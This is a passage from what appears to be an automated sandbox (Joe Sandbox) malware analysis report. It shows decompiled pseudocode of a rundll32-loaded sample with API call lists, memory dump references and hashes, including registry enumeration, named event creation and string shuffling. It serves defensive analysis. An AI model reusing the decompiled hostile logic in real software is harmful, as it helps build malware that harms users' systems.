                                									_t54 = E0106529C(__eflags,  &(_t67[4]));
                                									__eflags = _t54;
                                									if(_t54 == 0) {
                                										goto L30;
                                									}
                                									goto L29;
                                								}
                                								_t54 = 8;
                                							}
                                						}
                                					} else {
                                						_t68 = _v12;
                                						if(_t68 == 0) {
                                							L30:
                                							if(_v16 == 0 || _v16 == 1) {
                                								 *0x106a17c(); // executed
                                							}
                                							goto L34;
                                						}
                                						_t69 =  &(_t68[4]);
                                						do {
                                						} while (E01067928(_t63, _t69, 0, 1) == 0x4c7);
                                					}
                                					goto L30;
                                				} else {
                                					_t54 = _t22;
                                					L34:
                                					return _t54;
                                				}
                                			}































                                0x01063d2c
                                0x01063d36
                                0x01063d39
                                0x01063d3c
                                0x01063d3f
                                0x01063d46
                                0x01063d48
                                0x01063d54
                                0x01063d56
                                0x01063d56
                                0x01063d5f
                                0x01063d65
                                0x01063d6a
                                0x01063d84
                                0x01063d90
                                0x01063d92
                                0x01063d97
                                0x01063da1
                                0x01063da1
                                0x01063d99
                                0x01063d99
                                0x01063d99
                                0x01063d99
                                0x01063da8
                                0x01063db5
                                0x01063dbc
                                0x01063dc1
                                0x01063dc1
                                0x01063dca
                                0x01063dcd
                                0x01063df3
                                0x01063dff
                                0x01063e04
                                0x01063e09
                                0x01063e0b
                                0x01063e37
                                0x01063e39
                                0x01063e0d
                                0x01063e11
                                0x01063e16
                                0x01063e1b
                                0x01063e22
                                0x01063e28
                                0x01063e2d
                                0x01063e33
                                0x01063e3a
                                0x01063e3c
                                0x01063e3e
                                0x01063e4d
                                0x01063e53
                                0x01063e58
                                0x01063e5a
                                0x01063e8a
                                0x01063e8c
                                0x01063e5c
                                0x01063e5c
                                0x01063e62
                                0x01063e6f
                                0x01063e75
                                0x01063e75
                                0x01063e7d
                                0x01063e86
                                0x01063e8d
                                0x01063e8f
                                0x01063e91
                                0x01063e98
                                0x01063ea5
                                0x01063eaa
                                0x01063eaf
                                0x01063eb1
                                0x01063eb3
                                0x00000000
                                0x00000000
                                0x01063eb5
                                0x01063eba
                                0x01063ebc
                                0x01063ec3
                                0x01063ec7
                                0x01063eca
                                0x01063edf
                                0x01063ee3
                                0x01063ee8
                                0x00000000
                                0x01063ee8
                                0x01063ecc
                                0x01063ece
                                0x00000000
                                0x00000000
                                0x01063ed9
                                0x01063edb
                                0x01063edd
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01063edd
                                0x01063ec0
                                0x01063ec0
                                0x01063e91
                                0x01063dcf
                                0x01063dcf
                                0x01063dd4
                                0x01063eea
                                0x01063eef
                                0x01063ef7
                                0x01063ef7
                                0x00000000
                                0x01063eef
                                0x01063dda
                                0x01063ddd
                                0x01063de7
                                0x01063dee
                                0x00000000
                                0x01063eff
                                0x01063eff
                                0x01063f02
                                0x01063f06
                                0x01063f06

                                APIs
                                  • Part of subcall function 01063CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,01063D44,00000001), ref: 01063D0C
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 01063DC1
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • memset.NTDLL ref: 01063E11
                                • RtlInitializeCriticalSection.NTDLL(05109570), ref: 01063E22
                                  • Part of subcall function 0106529C: memset.NTDLL ref: 010652B6
                                  • Part of subcall function 0106529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 010652FC
                                  • Part of subcall function 0106529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 01065307
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 01063E4D
                                • wsprintfA.USER32 ref: 01063E7D
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 8bfd698f33f03a9172141292c367071ba000068b04606d5d8b48ff7fb50f904a
                                • Instruction ID: 39e2b0d9ccbd7fc8614a8a00ca3bb9723ca25fed0af6fb596b89e920406a92ae
                                • Opcode Fuzzy Hash: 8bfd698f33f03a9172141292c367071ba000068b04606d5d8b48ff7fb50f904a
                                • Instruction Fuzzy Hash: 1151A371B40225EFDB61BBA8DC44BAE37FCBB14700F004459F5C9EB195D67699408BE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E010619E2(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E01066D63(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E01066C2C(_v16);
                                								goto L37;
                                							}
                                							_t24 = _v8 + 5; // 0xcdd8d2f8
                                							_t103 = E01066D63((_v8 + _t24) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x106a318 = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                			}





















                                0x010619e9
                                0x010619f0
                                0x010619f5
                                0x010619f8
                                0x010619ff
                                0x01061a02
                                0x01061a05
                                0x01061a0a
                                0x01061a0f
                                0x01061b63
                                0x01061b65
                                0x01061b67
                                0x01061b6c
                                0x01061b6c
                                0x01061a15
                                0x01061a18
                                0x01061a1b
                                0x01061a1d
                                0x01061a1d
                                0x01061a21
                                0x00000000
                                0x00000000
                                0x01061a25
                                0x01061a51
                                0x01061a56
                                0x01061a58
                                0x01061a58
                                0x01061a5b
                                0x01061a5e
                                0x01061a5e
                                0x01061a60
                                0x00000000
                                0x01061a2b
                                0x01061a2d
                                0x01061a4c
                                0x01061a4c
                                0x01061a63
                                0x01061a63
                                0x01061a64
                                0x01061a64
                                0x01061a67
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01061a67
                                0x01061a31
                                0x01061a78
                                0x01061a7c
                                0x01061b56
                                0x01061b58
                                0x01061b58
                                0x01061b59
                                0x01061b5c
                                0x00000000
                                0x01061b5c
                                0x01061a85
                                0x01061a96
                                0x01061a9a
                                0x01061b52
                                0x00000000
                                0x01061b52
                                0x01061aa0
                                0x01061aa3
                                0x01061aa7
                                0x01061aab
                                0x01061ab0
                                0x01061b48
                                0x01061b48
                                0x00000000
                                0x01061b4e
                                0x01061abb
                                0x01061ac4
                                0x01061ad8
                                0x01061adf
                                0x01061af4
                                0x01061afa
                                0x01061b02
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01061b04
                                0x01061b04
                                0x01061b04
                                0x01061b0b
                                0x01061b13
                                0x00000000
                                0x00000000
                                0x01061b15
                                0x01061b1e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01061b20
                                0x01061b22
                                0x01061b25
                                0x01061b25
                                0x01061b28
                                0x01061b2c
                                0x01061b2f
                                0x01061b35
                                0x01061b38
                                0x01061b3f
                                0x00000000
                                0x01061abb
                                0x01061a36
                                0x01061a3e
                                0x01061a44
                                0x01061a46
                                0x01061a46
                                0x01061a49
                                0x01061a4b
                                0x00000000
                                0x01061a4b
                                0x01061a25
                                0x01061a6b
                                0x01061a70
                                0x01061a72
                                0x01061a72
                                0x01061a75
                                0x01061a75
                                0x00000000

                                APIs
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 01061ADF
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 01061AF4
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 01061B0B
                                • lstrlen.KERNEL32(69B25F45), ref: 01061B2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: f9afb64e2c9887ab522faa1a743a53aea3adb31a174f255f4c5fc7e41fef0f3a
                                • Instruction ID: 373b9ca4292c881e62074ffc4e9d0e985861c135e92a5b94172a8694ded302eb
                                • Opcode Fuzzy Hash: f9afb64e2c9887ab522faa1a743a53aea3adb31a174f255f4c5fc7e41fef0f3a
                                • Instruction Fuzzy Hash: 2051B131A00208EFDF21CF99C5846EDBBFAFF95314F05C09AE995AB215C771AA41CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0106498E(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				long _t14;
                                				void* _t18;
                                				WCHAR* _t19;
                                				long _t20;
                                				void* _t25;
                                				signed int* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				WCHAR** _t32;
                                
                                				_t6 =  *0x106a310; // 0xd448b889
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0x109a6410;
                                				_t8 =  *0x106a348; // 0x409d5a8
                                				_t3 = _t8 + 0x106b87a; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E010611C3(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x106a34c, 1, 0, _t30);
                                					E01066C2C(_t30);
                                				}
                                				_t12 =  *0x106a2fc; // 0x4000000a
                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                                					L12:
                                					_t28 = _a8;
                                					if(_t28 != 0) {
                                						 *_t28 =  *_t28 | 0x00000001;
                                					}
                                					_t14 = E0106402A(_t32, 0); // executed
                                					_t31 = _t14;
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t28 != 0 && _t31 != 0) {
                                						 *_t28 =  *_t28 & 0xfffffffe;
                                					}
                                					goto L20;
                                				} else {
                                					_t18 = E010668BD(); // executed
                                					if(_t18 != 0) {
                                						goto L12;
                                					}
                                					_t19 = StrChrW( *_t32, 0x20);
                                					if(_t19 != 0) {
                                						 *_t19 = 0;
                                						_t19 =  &(_t19[1]);
                                					}
                                					_t20 = E01067928(0,  *_t32, _t19, 0); // executed
                                					_t31 = _t20;
                                					if(_t31 == 0) {
                                						if(_t25 == 0) {
                                							L22:
                                							return _t31;
                                						}
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                						if(_t31 == 0) {
                                							L20:
                                							if(_t25 != 0) {
                                								CloseHandle(_t25);
                                							}
                                							goto L22;
                                						}
                                					}
                                					goto L12;
                                				}
                                			}

















                                0x0106498f
                                0x01064996
                                0x010649a0
                                0x010649a4
                                0x010649aa
                                0x010649b9
                                0x010649c0
                                0x010649c4
                                0x010649d6
                                0x010649d8
                                0x010649d8
                                0x010649dd
                                0x010649e4
                                0x01064a3b
                                0x01064a3b
                                0x01064a41
                                0x01064a43
                                0x01064a43
                                0x01064a48
                                0x01064a4d
                                0x01064a51
                                0x01064a63
                                0x01064a63
                                0x01064a67
                                0x01064a6d
                                0x01064a6d
                                0x00000000
                                0x010649f4
                                0x010649f4
                                0x010649fb
                                0x00000000
                                0x00000000
                                0x01064a02
                                0x01064a0a
                                0x01064a0e
                                0x01064a12
                                0x01064a12
                                0x01064a1a
                                0x01064a1f
                                0x01064a23
                                0x01064a27
                                0x01064a7c
                                0x01064a82
                                0x01064a82
                                0x01064a35
                                0x01064a39
                                0x01064a70
                                0x01064a72
                                0x01064a75
                                0x01064a75
                                0x00000000
                                0x01064a72
                                0x01064a39
                                0x00000000
                                0x01064a23

                                APIs
                                  • Part of subcall function 010611C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05109D70,00000000,?,?,69B25F44,00000005,0106A00C,4D283A53,?,?), ref: 010611F9
                                  • Part of subcall function 010611C3: lstrcpy.KERNEL32(00000000,00000000), ref: 0106121D
                                  • Part of subcall function 010611C3: lstrcat.KERNEL32(00000000,00000000), ref: 01061225
                                • CreateEventA.KERNEL32(0106A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,01067187,?,?,?), ref: 010649CF
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                • StrChrW.SHLWAPI(01067187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,01067187,?,?,?), ref: 01064A02
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,01067187,00000000,00000000,?,00000000,?,01067187,?,?,?), ref: 01064A2F
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,01067187,?,?,?), ref: 01064A5D
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,01067187,?,?,?), ref: 01064A75
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 59df5019c325ab4d6f776df6c9339df5f60499f802dcdddcdf5bfe8a378b4186
                                • Instruction ID: 8a7d59df7bf0fb02fa472931c74c7e3456feecd8407debabd4f49fc633a2113b
                                • Opcode Fuzzy Hash: 59df5019c325ab4d6f776df6c9339df5f60499f802dcdddcdf5bfe8a378b4186
                                • Instruction Fuzzy Hash: 12213732600711BFE772AE6C9C44AAF76EDEF88B14B054665FEC1EB105DB76C8008798
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 0106755B
                                • SysAllocString.OLEAUT32(01063520), ref: 0106759F
                                • SysFreeString.OLEAUT32(00000000), ref: 010675B3
                                • SysFreeString.OLEAUT32(00000000), ref: 010675C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: dbf7b73a226dafb5a682d083d9bc556dcf2db8b7f3cc85432760729421acc232
                                • Instruction ID: a1373efe5b0aaa2bce14d99964b0668c2e4f7213aba296addcc2f5c48789a22e
                                • Opcode Fuzzy Hash: dbf7b73a226dafb5a682d083d9bc556dcf2db8b7f3cc85432760729421acc232
                                • Instruction Fuzzy Hash: 4E313EB1900249EFDB11DF98D8809EE7BB9FF48304B20846EFA46D7250D7759641CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E010671B6(void* __ecx, intOrPtr _a4) {
                                				int* _v8;
                                				int _v12;
                                				int* _v16;
                                				int _v20;
                                				int* _v24;
                                				char* _v28;
                                				void* _v32;
                                				long _t33;
                                				char* _t35;
                                				long _t39;
                                				long _t42;
                                				intOrPtr _t47;
                                				void* _t51;
                                				long _t53;
                                
                                				_t51 = __ecx;
                                				_v8 = 0;
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v24 = 0;
                                				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                				_t53 = _t33;
                                				if(_t53 != 0) {
                                					L18:
                                					return _t53;
                                				}
                                				_t53 = 8;
                                				_t35 = E01066D63(0x104);
                                				_v28 = _t35;
                                				if(_t35 == 0) {
                                					L17:
                                					RegCloseKey(_v32); // executed
                                					goto L18;
                                				}
                                				_v20 = 0x104;
                                				do {
                                					_v16 = _v20;
                                					_v12 = 0x104;
                                					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                					_t53 = _t39;
                                					if(_t53 != 0xea) {
                                						if(_t53 != 0) {
                                							L14:
                                							if(_t53 == 0x103) {
                                								_t53 = 0;
                                							}
                                							L16:
                                							E01066C2C(_v28);
                                							goto L17;
                                						}
                                						_t42 = E01063472(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                						_t53 = _t42;
                                						if(_t53 != 0) {
                                							goto L14;
                                						}
                                						goto L12;
                                					}
                                					if(_v12 <= 0x104) {
                                						if(_v16 <= _v20) {
                                							goto L16;
                                						}
                                						E01066C2C(_v24);
                                						_v20 = _v16;
                                						_t47 = E01066D63(_v16);
                                						_v24 = _t47;
                                						if(_t47 != 0) {
                                							L6:
                                							_t53 = 0;
                                							goto L12;
                                						}
                                						_t53 = 8;
                                						goto L16;
                                					}
                                					_v8 = _v8 + 1;
                                					goto L6;
                                					L12:
                                				} while (WaitForSingleObject( *0x106a30c, 0) == 0x102);
                                				goto L16;
                                			}

















                                0x010671b6
                                0x010671d0
                                0x010671d3
                                0x010671d6
                                0x010671d9
                                0x010671dc
                                0x010671e2
                                0x010671e6
                                0x010672c0
                                0x010672c4
                                0x010672c4
                                0x010671ef
                                0x010671f6
                                0x010671fb
                                0x01067200
                                0x010672b5
                                0x010672b8
                                0x00000000
                                0x010672be
                                0x01067206
                                0x01067209
                                0x01067210
                                0x0106721a
                                0x01067223
                                0x01067229
                                0x01067231
                                0x01067269
                                0x010672a3
                                0x010672a9
                                0x010672ab
                                0x010672ab
                                0x010672ad
                                0x010672b0
                                0x00000000
                                0x010672b0
                                0x0106727e
                                0x01067283
                                0x01067287
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01067287
                                0x01067236
                                0x01067245
                                0x00000000
                                0x00000000
                                0x0106724a
                                0x01067253
                                0x01067256
                                0x0106725b
                                0x01067260
                                0x0106723b
                                0x0106723b
                                0x00000000
                                0x0106723b
                                0x01067264
                                0x00000000
                                0x01067264
                                0x01067238
                                0x00000000
                                0x01067289
                                0x01067296
                                0x00000000

                                APIs
                                • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01067168,?), ref: 010671DC
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • RegEnumKeyExA.KERNEL32(?,?,?,01067168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01067168), ref: 01067223
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,01067168,?,01067168,?,?,?,?,?,01067168,?), ref: 01067290
                                • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01067168,?), ref: 010672B8
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                • String ID:
                                • API String ID: 3664505660-0
                                • Opcode ID: a3d2d3b42730da49d7e390e5b14f7e60ced3fb7d67fe7e15a4aff1d154232282
                                • Instruction ID: c1779b4cacc98469242db9356db37bc26a7ad530c5436c72648ce4b1ccbeb0ea
                                • Opcode Fuzzy Hash: a3d2d3b42730da49d7e390e5b14f7e60ced3fb7d67fe7e15a4aff1d154232282
                                • Instruction Fuzzy Hash: 82314971D0011AEFDF22AFA9D8849EEFFBDFB54714F204066F991B2121D2750A808B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 41%
                                			E010670D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t20;
                                				void* _t26;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t20 = E010654BB(__ecx,  &_v32); // executed
                                				_t38 = _t20;
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t23 =  &(_t39[1]);
                                						if(_t39[1] != 0) {
                                							E010678BF(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				_t26 = E01063695(0x40,  &_v16); // executed
                                				if(_t26 != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x106a34c, 1, 0,  *0x106a3e4);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8); // executed
                                					CloseHandle(_t40);
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E010671B6(_t36); // executed
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E01063472(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E01063AC2(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E0106498E( &_v32, _t39);
                                					goto L13;
                                				}
                                			}














                                0x010670d8
                                0x010670e5
                                0x010670eb
                                0x010670ec
                                0x010670ed
                                0x010670ee
                                0x010670ef
                                0x010670f3
                                0x010670fa
                                0x010670ff
                                0x01067103
                                0x0106718b
                                0x0106718b
                                0x0106718e
                                0x01067190
                                0x01067198
                                0x0106719e
                                0x010671a1
                                0x010671a1
                                0x0106719e
                                0x010671ac
                                0x010671ac
                                0x0106710f
                                0x01067116
                                0x01067118
                                0x01067118
                                0x0106712f
                                0x01067133
                                0x01067136
                                0x01067141
                                0x01067148
                                0x01067148
                                0x01067151
                                0x01067155
                                0x01067163
                                0x01067157
                                0x01067157
                                0x01067158
                                0x01067159
                                0x0106715a
                                0x0106715b
                                0x0106715c
                                0x0106715c
                                0x01067168
                                0x0106716b
                                0x0106716f
                                0x01067171
                                0x01067171
                                0x01067178
                                0x00000000
                                0x0106717a
                                0x0106717a
                                0x01067187
                                0x00000000
                                0x01067187

                                APIs
                                • CreateEventA.KERNEL32(0106A34C,00000001,00000000,00000040,?,?,76DDF710,00000000,76DDF730), ref: 01067129
                                • SetEvent.KERNEL32(00000000), ref: 01067136
                                • Sleep.KERNEL32(00000BB8), ref: 01067141
                                • CloseHandle.KERNEL32(00000000), ref: 01067148
                                  • Part of subcall function 010671B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,01067168,?), ref: 010671DC
                                  • Part of subcall function 010671B6: RegEnumKeyExA.KERNEL32(?,?,?,01067168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,01067168), ref: 01067223
                                  • Part of subcall function 010671B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,01067168,?,01067168,?,?,?,?,?,01067168,?), ref: 01067290
                                  • Part of subcall function 010671B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,01067168,?), ref: 010672B8
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                • String ID:
                                • API String ID: 891522397-0
                                • Opcode ID: cc1942b27f5e544b503ba1d68c4a69a00e6f2ceb003b29edbc9d5cc3272fa4fe
                                • Instruction ID: 7f690471e9fe5a01daf5ba6475f3cee17aace326cfc1f45089b82e53765f4a18
